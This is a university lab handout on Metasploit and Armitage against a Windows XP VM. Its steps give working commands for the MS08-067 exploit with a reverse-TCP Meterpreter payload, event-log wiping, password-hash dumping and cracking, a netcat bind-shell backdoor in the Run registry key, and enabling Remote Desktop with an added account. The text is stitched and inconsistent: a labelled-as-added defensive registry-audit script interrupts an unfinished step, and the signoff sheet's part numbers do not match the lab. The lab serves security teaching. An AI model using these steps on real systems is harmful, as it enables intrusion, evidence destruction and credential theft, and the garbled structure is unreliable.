Title: Lab 4 – Metasploit & Armitage
Course: Fundamentals of Computing Security
Institution: Rochester Institute of Technology
Pages: 16

Rochester Institute of Technology Department of Computing Security Lab 4 – Metasploit & Armitage

CSEC 101

Page 1 of 16

Objectives: To explore how to use basic Metasploit commands and the corresponding Armitage interface, in addition to basic post-exploitation techniques.

Disclaimer: This lab may be completed in either the Security Lab (GOL 2410) or the Airgap Lab (GOL 2130).

All values within square brackets require your own input, e.g. "ping [target computer]" = ping 192.168.1.1. All values within angle brackets require keyboard input, e.g. <Enter>. All double quotes in each command should be ignored unless specified.

This lab will require signoffs, which entails an instructor, lab assistant, or tutor who has CSEC 101 signoff abilities. To see which tutor or lab assistant has signoff capabilities, find the lab schedule. If you are seeking signoffs during open lab hours, ask lab assistants or tutors who are on shift and working to sign you off. Tutors and lab assistants who are not working are not required to give signoffs; this is at the discretion of the respective tutor or lab assistant. You are prohibited from sharing signoff sheets with other students.

Passwords List:

               Kali Linux VM    Windows XP SP0/1 VM
   Username    Root             Student
   Password    cseclabs         student


Part I: Using Metasploit

Using the lab machines in the Security Lab (GOL 2410) or Airgap Lab (GOL 2130), start up VMware Workstation and start an instance of Windows XP SP0/SP1 and Kali Linux. For the Windows XP SP0/SP1 VM, revert the image to the Service Pack 0 snapshot. To help you later in the lab, obtain the IP addresses of both the Windows XP and Kali VM by running ipconfig or ifconfig (respectively). Fill out this information on the last page of this instruction sheet, titled "SIGNOFF SHEET".

To start out, you will open two terminal sessions on your Kali VM. One terminal session will be used to run an nmap scan while the second will be used to run Metasploit.

1. On the Kali box, open a terminal session.
2. Start the PostgreSQL database: /etc/init.d/postgresql start
3. Initialize the Metasploit Framework database: msfdb init
4. Run msfconsole: msfconsole
5. Wait a while; you will see some text response. *Note, congratulations, you have started Metasploit.
6. Open a second terminal. You will use this terminal to run nmap.
7. In the second terminal, type: nmap and explore all the options, especially -O, -A, and -v.
8. Now, in the second terminal, type: "nmap -O -A -v [IP of XP VM]" (everything is always case sensitive). Notice at the bottom of the output there are lines regarding SMB security on the XP machine. What is SMB? Why is it vulnerable? Why is it important to also see, from the output, that port 445 is open?
9. Go back to the initial terminal running msfconsole (Metasploit).
10. Type: "search smb" to see all exploits associated with SMB.
11. We will pick ms08_067_netapi. Type: "search ms08_067_netapi". This will give you the location where the exploit is located in Metasploit.
12. Type "info exploit/windows/smb/ms08_067_netapi" to learn more about the exploit we've selected.
13. Looks good! Now let's type "use exploit/windows/smb/ms08_067_netapi". You'll notice that the prompt changes to a specific exploit prompt:

   msf > use exploit/windows/smb/ms08_067_netapi
   msf exploit(ms08_067_netapi) >

14. Now you need to understand the difference between an exploit and a payload. The exploit is the flaw in the system that you are going to take advantage of. In the case of MS08-067, it is a problem in the SMB service. The modules that you searched for above are simply exploits. You can also search for exploits on the command line by typing "search ms08" or whatever you are looking for. A payload is what you will send once the exploit has been executed. This payload represents the code that will be run on a system after a vulnerability has been found in the system and an entry point is set. Many exploit kits use some sort of spyware as a payload. Metasploit also has a number of payloads. Different payloads work for different exploits. Some payloads include a VNC payload (so you can view their screen), or a reverse TCP payload (so you can browse their filesystem, etc.). There is also a very powerful Meterpreter payload that has lots of additional commands we'll look at. Type: "show payloads" to see all available payloads, and then "set payload windows/meterpreter/reverse_tcp" to pick this specific one. You'll notice a line of output confirming that the payload has been set:

   msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

   payload => windows/meterpreter/reverse_tcp

FYI, the following command unsets the payload, along with the corresponding output (but don't do it):

   unset payload windows/meterpreter/reverse_tcp


   Unsetting payload...
   Unsetting windows/meterpreter/reverse_tcp...

15. Now we need to configure the exploit as per the needs of the current scenario. Type "show options" and notice the various parameters which are required for the exploit to be launched properly.
16. Type: "show targets". This will give you all of the targets this exploit works for. Search for the one that matches your nmap output. It's close to the top.
17. Type: "set TARGET [2]"
18. Type: "set RHOST [10.80.100.47]"
19. Type: "set LHOST [10.80.100.17]"
20. Type: "show options" to verify all of your settings are correct.

21. Type: "exploit" ... Congratulations, you have a shell!


*Note, at this point, you should see the word “meterpreter”. If you do not, then you may have to review the previous steps to verify your work.

22. In the meterpreter prompt, type: "screenshot"
23. Look at the location where the screenshot was saved. Click the Places pull-down menu at the top of the screen and then go to the Home folder.
24. Show your screenshot to your instructor or the lab assistant for a signoff.
25. Type "help" at the meterpreter prompt to see many other things you can do to the pwned machine! Which ones seem the most interesting and valuable to you?


Part II: Meterpreter Commands

Meterpreter is a powerful asset to utilize in penetration testing, and in order to fully understand its capabilities, we will examine some advanced techniques.

1. In the Windows XP VM, locate "Event Viewer" (Start / right-click My Computer / Manage / look under System Tools), and examine the information it contains.
2. In the Kali VM, with the previous Meterpreter prompt from Part I, execute the command "clearev":

   meterpreter > clearev
   [*] Wiping 38 records from Application...
   [*] Wiping 121 records from System...
   [*] Wiping 0 records from Security...

3. Go back to the Windows XP VM, refresh, and examine Event Viewer.
4. While still in the Windows XP VM, open Task Manager and view the Processes tab.
5. In Task Manager, change the view (View, Select Columns, PID) to show the column PID (Process Identifier). A PID column should appear in Task Manager.
6. In the Kali VM, type: "run post/windows/manage/migrate" within the meterpreter prompt.

   meterpreter > run post/windows/manage/migrate
   [*] Running module against XPBOB-GG87VQZOZ
   [*] Current server process: svchost.exe (960)
   [*] Spawning notepad.exe process to migrate to
   [+] Migrating to 880
   [+] Successfully migrated to process 880

7. Go back to the Windows XP VM, and examine in Task Manager the new process that was generated by the migrate option. Explain to your instructor or lab assistant why both "clearev" and the migrate post module can be useful as an offensive skillset. Additionally, show the newly created process generated by the migrate module in Task Manager for a signoff.

Part III: Password Hashes and John The Ripper


Passwords are often stored in a system as a hash (although they should always be). This is a useful way to secure them in case a system becomes compromised, as passwords in plaintext are human-readable while hash values are not. We will examine the integrity of the NTLM password scheme in Windows.

1. In the Windows XP VM, create the following five user accounts with the following parameters (passwords are case sensitive):

   A. Username: weissman   Password: jonathan
   B. Username: upper      Password: PASSWORD
   C. Username: lower      Password: password
   D. Username: mixed      Password: Password
   E. Username: story      Password: 3bears

2. In the previous Meterpreter prompt from Part II, type "run winenum" and examine the contents of the text files with the results of your Windows enumeration. Open another terminal and navigate to this directory:

   cd /root/.msf4/logs/scripts/winenum/

   Then type ls to see the contents of the directory. There will be a directory there that contains text files with all the enumerated information. Type cd, hit the space bar, and then hit the Tab key, which will populate the name of the directory after the cd command. Hit <Enter>. Now you're in the directory with the text files. Type ls to see the contents of the directory.


View the contents of the text files with the cat utility:

   cat net_user.txt
   cat ipconfig__all.txt
   cat hashdump.txt
   ...etc...

Specifically, focus on the output from the hashdump.txt file:

3. Type john to see all available options for the John The Ripper password cracking utility.
4. Type john --format=nt hashdump.txt

   Whoa! What do you see??? If John gets hung up on default Windows XP accounts and doesn't return you to the prompt, hit Ctrl + C to kill it.

5. Type john --format=nt --show hashdump.txt, and show the output to your instructor for a signoff.
6. Type cat /usr/share/john/password.lst | less to see the contents of the John password file. Advance line by line with the Enter key. Advance page by page with the spacebar. Break out by hitting the q key.
7. Type cd /usr/share/wordlists, and then gzip -d rockyou.txt.gz. Now type cat /usr/share/wordlists/rockyou.txt | less. To see if this more robust (compared to John) file has a specific password, type:

   cat /usr/share/wordlists/rockyou.txt | grep [password] | less

   For example:

   cat /usr/share/wordlists/rockyou.txt | grep password | less
   cat /usr/share/wordlists/rockyou.txt | grep p@ss | less
   cat /usr/share/wordlists/rockyou.txt | grep p@ssw0rd | less

8. Create a user with a more difficult password on the XP system (although p@ssw0rd is not a safe password, the John list doesn't have it, but rockyou does). To see if rockyou.txt can crack it, type:

   john --wordlist=/usr/share/wordlists/rockyou.txt --format=nt hashdump.txt

   To see the results, type:

   john --format=nt --show hashdump.txt


Part IV: Backdoor and Persistence

Once you have exploited a machine, it is very important to maintain that level of access, as patches, firewalls, and other fixes may occur over time, which may prevent you from using the same exploit. To maintain access, we will be using a tool called netcat, understanding persistence, and creating a backdoor.

1. In the Windows XP VM, click the Start button, in the Run bar type msconfig, and examine the Startup tab. *Note, msconfig is a powerful tool. All items checked in the Startup tab are programs that execute when you initially log on to a computer.

2. In the meterpreter prompt within the Kali VM, type the following:

   A. upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

   This uploads the Windows version of netcat (nc.exe) to the compromised system.

   B. reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

   The EnumKey method enables you to return the subkeys of a registry key or subkey. Note that the EnumKey method returns only the immediate subkeys of a key or subkey; it does not return any subkeys that might be contained within those top-level subkeys.

   C. reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 5000 -e cmd.exe'

   *Note, there is a space between -d and 'C:\windows\system32\nc.exe'. This writes to the registry key we accessed in the previous step. Specifically, we are starting a netcat listener on port 5000 of the compromised machine, so we can get back into it with a lot less effort!

   D. reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

   This lets us know that we're good!


3. Now type: "exit" to leave the meterpreter session.

   *Note, you should now be in the msf prompt.

4. Reboot the XP machine.
5. Under the msf prompt, type: "nc [IP of XP VM] 5000"
   *Note1, the number 5000 represents the port that was established in Part IV.2.C.
   *Note2, congratulations, you just used your newly created backdoor through a netcat tunnel.

6. Issue the command shutdown -r -t 5 -c "Computing Security"
   *Note1, there are double quotes around Computing Security.
   *Note2, the Windows XP VM should be restarting.

7. Type: "nc [IP of XP VM] 5000" again after the Windows XP VM completely restarts.
   *Note1, this kind of backdoor is highly vulnerable, as anyone can access it as long as they have netcat on their machine. Please do not attempt to compromise fellow students' Windows XP VMs!
   *Note2, for future reference, in controlled testing situations, it is recommended to nmap a subnet and netcat various ports on a targeted machine. You may, one day, find a backdoor.

8. In the Kali VM, using the netcat tunnel, figure out a way to list all open ports on the Windows XP VM.


9. Go back to the Windows XP VM, and view the Startup tab of "msconfig" to find something interesting and cool.
10. Demonstrate to your instructor the command you used through the netcat tunnel in step 8, explain what each command in step 2 does, and why we need two backslashes in steps A, B, C, and D, for a signoff.
   *Note1, you will have to do some research to give an explanation. Some keywords to search are:
   A. Windows Registry
   B. Reg command
   C. Netcat
   *Note2, for the double backslash portion, think programming.


Part V: Armitage

Now that we have taken the scenic route using Metasploit, we are going to show you a tool called Armitage that uses Metasploit. You will find that this is a much faster way of using exploits.

1. Start the PostgreSQL database: /etc/init.d/postgresql start
2. Initialize the Metasploit Framework database: msfdb init

In the next steps, if you are experiencing problems with Armitage, this will help:

   step 1: http://http.kali.org/pool/main/a/armitage/
   step 2: armitage_20150812-1kali1_all.deb
   step 3: go to the command prompt
   step 4: cd into the Downloads folder
   step 5: type in "dpkg -i armitage_20150812-1kali1_all.deb"
   step 6: type in "armitage & disown"
   step 7: run armitage; it should work

In the Kali menu bar in the GUI, mouse over Applications, Favorites, 08 Exploitation Tools, armitage.

1. Click Connect/Yes when the pop-up menu appears.
2. The target host should already be there. If it is not, or you want to start from scratch, go to Hosts -> Nmap Scan -> Quick Scan (OS detect).
3. Click on the target host (it will now be surrounded by a green dashed border) and in the left panel double-click exploit -> windows -> smb -> ms08_067_netapi. Click Launch. When the machine is pwned, you will see a red border around the machine with lightning!


4. Right-click on the host and click meterpreter1 -> Interact -> Meterpreter Shell.
5. In the Meterpreter shell, type "run getgui -h" to see interesting options for our final exercise. In the XP machine, click Start, right-click My Computer, and click Properties. Open the Remote tab and notice that there is no check in the Remote Desktop section. Close the dialog box. Don't worry, we can do that ourselves with Meterpreter:

   reg setval -k "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -v fDenyTSConnections -t REG_DWORD -d 0

   Now look again in the Remote Desktop section. Voila!

6. In Meterpreter: run getgui -u csec -p rit, then open up another terminal and run this command: rdesktop -u csec -p rit [IP of XP VM]
7. Take a peek in the XP VM, where the currently logged-on user will be asked a question. Let's pretend that the user is not in front of his computer. Wait for it... Wait for it... What do you see in Kali now? Show your instructor for a signoff!
8. Remember, these sorts of changes can be very powerful. However, use that power wisely, as all of these steps alter the system in ways that can be used by investigators to track what actions were taken on it. The more changes that are made, the more evidence you leave behind. When you are done with the current system, you will want to run the cleanup script provided to remove the added account. The cleanup command is shown at the bottom of the output here, and will be different each time you use the run getgui command:
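The changes made in Part IV step 2 (a new Run value launching nc.exe) and Part V step 5 (fDenyTSConnections set to 0) are the kind of evidence step 8 warns about, and they are exactly what a defender checks for. The Python below is an added example, not part of the lab: it diffs two constructed registry snapshots, an assumed clean XP VM and the same VM after the lab's changes, and reports new or changed autostart values, autostart commands that resemble a listener handing out a shell, and Remote Desktop being switched on. The key paths are the ones the lab uses; the VMware entry and the starting values are assumptions.

```python
import re

RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
TS_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"

# Constructed snapshots, not real registry exports. BEFORE is an assumed clean XP VM;
# AFTER holds the values written in Part IV step 2.C and Part V step 5. Raw strings
# (r"...") are used so each backslash in a path is written once.
BEFORE = {
    RUN_KEY: {"VMware User Process": r'"C:\Program Files\VMware\VMware Tools\VMwareUser.exe"'},
    TS_KEY: {"fDenyTSConnections": 1},
}
AFTER = {
    RUN_KEY: {
        "VMware User Process": r'"C:\Program Files\VMware\VMware Tools\VMwareUser.exe"',
        "nc": r"C:\windows\system32\nc.exe -Ldp 5000 -e cmd.exe",
    },
    TS_KEY: {"fDenyTSConnections": 0},
}

# Autostart commands that resemble a listener handing out a shell: a netcat binary,
# "-e <...cmd.exe>", or a listen/port flag cluster such as "-Ldp 5000".
BIND_SHELL = re.compile(r"\bnc(?:at|64)?\.exe\b|-e\s+\S*cmd\.exe|-[a-z]*l[a-z]*p\s*\d{2,5}", re.I)


def audit(before: dict, after: dict) -> list:
    """Compare two snapshots; return human-readable findings (an empty list means no change)."""
    findings = []
    old_run, new_run = before.get(RUN_KEY, {}), after.get(RUN_KEY, {})
    for name, cmd in new_run.items():
        if name not in old_run:
            findings.append(f"new autostart value {name!r}: {cmd}")
        elif old_run[name] != cmd:
            findings.append(f"changed autostart value {name!r}: {cmd}")
        if BIND_SHELL.search(cmd):
            findings.append(f"autostart {name!r} resembles a bind shell: {cmd}")
    for name in old_run.keys() - new_run.keys():
        findings.append(f"autostart value {name!r} was removed")
    old_ts = before.get(TS_KEY, {}).get("fDenyTSConnections")
    new_ts = after.get(TS_KEY, {}).get("fDenyTSConnections")
    if new_ts == 0 and old_ts != 0:
        findings.append("Remote Desktop enabled: fDenyTSConnections changed to 0")
    return findings


if __name__ == "__main__":
    for finding in audit(BEFORE, AFTER):
        print("[!]", finding)
```

The same comparison is what the msconfig Startup tab in step 9 of Part IV shows by eye; the script just makes the baseline explicit so a one-line change in a Run key cannot hide among legitimate entries.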


SIGNOFF SHEET (Handwritten or with Foxit app)

Name: ____________________________________ (1 Point)
Date: ________________ (1 Point)

Scan and upload this document into the myCourses Dropbox for submission. All other documents will not be accountable for grading. Signatures must be shown on this signoff sheet. Keep this document for record if further questioning is needed.

(3 Points) PART I:
Windows XP VM IP: _______________________________________
Kali VM IP: ______________________________________________

(10 Points) PART I:
Show your instructor or lab assistant the screenshot of the Windows system after using the ms08_067_netapi exploit in the Kali VM.
Signature:            Date:            Printed Name:

(25 Points) PART II:
Demonstrate to your instructor or lab assistant the command you used through the netcat tunnel. Explain what each command did, and why you needed double backslashes.
Signature:            Date:            Printed Name:

(10 Points) PART V.8:
Show your instructor or lab assistant the cracked passwords from this exercise.